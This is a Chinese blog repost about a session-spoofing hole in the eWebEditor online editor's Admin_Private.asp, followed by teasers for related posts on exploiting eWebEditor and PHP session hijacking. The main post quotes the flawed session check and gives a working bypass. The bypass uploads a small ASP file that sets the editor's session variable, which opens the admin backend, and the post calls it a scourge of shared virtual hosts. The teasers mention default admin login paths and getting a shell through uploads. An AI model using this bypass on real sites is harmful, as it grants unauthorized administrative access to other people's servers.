eWebEditor session欺骗漏洞

转载 2006年05月25日 23:10:00

eWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%

If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp

漏洞影响:虚拟主机的克星. 

ewebeditor漏洞利用总结

碰到EWEBEDITOR的比较多,找了些资料,以后方便利用 先来说说第一个: 成功登录后台,发现后台很简陋,只有EWEBEDITOR可以利用,但是登陆后台被删除了(admin_login.asp)...
  • s98
  • s98
  • 2012年02月06日 15:02
  • 935

Ewebeditor 的一些漏洞总结

于是像windows一样被黑客们挖掘出很多漏洞,大家莫急,笔者Minghacker总结前人基础,一一道来。  对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:  默认,...
  • eldn__
  • eldn__
  • 2013年06月23日 21:35
  • 8347

ewebeditor漏洞大全

1:默认管理后台: http://www.backlion.com/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard 拷贝一...
  • xysoul
  • xysoul
  • 2015年03月23日 13:47
  • 2235

利用ewebeditor漏洞来攻击网站

原文:http://blog.163.com/chx_silk/blog/static/74422518200992214752475/ 大家好,今天给大家演示以下利用ewebeditor的程序...
  • eldn__
  • eldn__
  • 2013年06月06日 11:21
  • 1631

修复eWebEditor漏洞需要注意以下几个方面(大全总结)

第一步:下载eWebEditor2.8 修正版下载地址http://ewebeditor.webasp.net/download.asp解压放到项目文件目录下. 为了方便使用我把文件改名为ewebed...
  • hb0746
  • hb0746
  • 2011年05月23日 11:45
  • 411

Ewebeditor 2.1.6上传漏洞 UNION运用-直接得SHELL

以前曾进过一个网站,把上传部份的asp代码下载回来研究,当时感觉有漏洞但没仔细研究,还以为那是他们自已写的程序。前几天看到ewebeditor有漏洞的文章才想起那个网站原来用的也是ewebeditor...
  • god_7z1
  • god_7z1
  • 2011年04月21日 20:11
  • 660

ewebeditor漏洞利用总结

ewebeditor漏洞利用总结      先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下: 1、首先访问默认管理页看是否存在。         默认管理页地址2.80以前为 ...

ewebeditor漏洞利用总结

先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下: 1、首先访问默认管理页看是否存在。         默认管理页地址2.80以前为 ewebeditor/admin_login....

PHP漏洞全解(七)-Session劫持

本文主要介绍针对PHP网站Session劫持。session劫持是一种比较复杂的攻击方法。大部分互联网上的电脑多存在被攻击的危险。这是一种劫持tcp协议的方法,所以几乎所有的局域网,都存在被劫持可能。...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:eWebEditor session欺骗漏洞
举报原因:
原因补充:

(最多只允许输入30个字)